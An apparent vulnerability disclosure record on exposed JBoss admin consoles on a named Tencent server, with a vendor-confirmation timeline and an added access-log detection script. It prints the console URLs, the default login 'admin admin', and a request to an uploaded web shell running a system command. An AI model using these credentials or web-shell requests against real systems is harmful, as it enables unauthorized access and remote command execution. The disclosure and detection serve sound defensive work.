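2015-05-18: Details reported to the vendor; awaiting vendor handling
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and experts in related fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public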
Armor-piercing round: anonymous access to the admin console of a Tencent server (shell obtainable, internal network reachable)
http://health.gj.qq.com:8080/jmx-console/
OS Name: Linux
OS Version: 2.6.32.43-tlinux-1.0.10-state
Architecture: amd64
Distribution Name: CentOS Linux
Distribution Version: release 6.2 (Final)
http://health.gj.qq.com:8080/admin-console/secure/summary.seam?conversationId=4
admin admin
http://health.gj.qq.com:8080/a/pwn.jsp?cmd=ifconfig%20-a
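A defender-side check for the request pattern shown in the URLs above, added here as an example and not part of the original report: it scans access-log lines for external hits on the two JBoss consoles and for JSP requests carrying a `cmd` parameter. The common/combined log format, the internal address ranges and the sample lines are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

CONSOLE_PREFIXES = ("/jmx-console", "/admin-console")  # paths named in the report
SHELL_PARAMS = {"cmd"}                                 # parameter in the report's JSP URL
# Assumed internal ranges; ipaddress.is_private is avoided because it also
# covers documentation ranges such as 203.0.113.0/24.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def is_external(client):
    try:
        ip = ipaddress.ip_address(client)
    except ValueError:
        return True  # hostname or garbage in the client field: treat as untrusted
    return not any(ip in net for net in INTERNAL)

def classify(line):
    """Return the findings for one access-log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, user, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    findings = []
    if is_external(client) and path.startswith(CONSOLE_PREFIXES):
        # "-" user plus 2xx: the console answered without HTTP authentication
        anonymous = user == "-" and status.startswith("2")
        findings.append("console-anonymous" if anonymous else "console-probe")
    params = set(parse_qs(url.query, keep_blank_values=True))
    if path.endswith(".jsp") and params & SHELL_PARAMS:
        findings.append("jsp-command-param")
    return findings

# Constructed sample lines (addresses and timestamps are made up).
SAMPLE = [
    '203.0.113.7 - - [18/May/2015:11:50:01 +0800] "GET /jmx-console/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/May/2015:11:54:10 +0800] "GET /a/pwn.jsp?cmd=ifconfig%20-a HTTP/1.1" 200 2048',
    '10.0.0.5 - ops [18/May/2015:11:55:00 +0800] "GET /jmx-console/ HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/May/2015:11:56:00 +0800] "GET /admin-console/ HTTP/1.1" 401 0',
    '203.0.113.8 - - [18/May/2015:11:57:00 +0800] "GET /index.jsp?page=2 HTTP/1.1" 200 900',
]

def scan(lines):
    """Map each flagged line index to its findings."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}
```

Form-based console logins do not populate the log's user field, so a `console-anonymous` hit on such a console means it is reachable from outside, not necessarily that it is unauthenticated.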
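Handling
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-05-18 16:01
Vulnerability confirmed. Thank you very much for your report; we have begun handling the issue. Thank you all for your attention to the security of Tencent's services. If you have any questions, feedback is welcome, and a dedicated person will follow up.
None yet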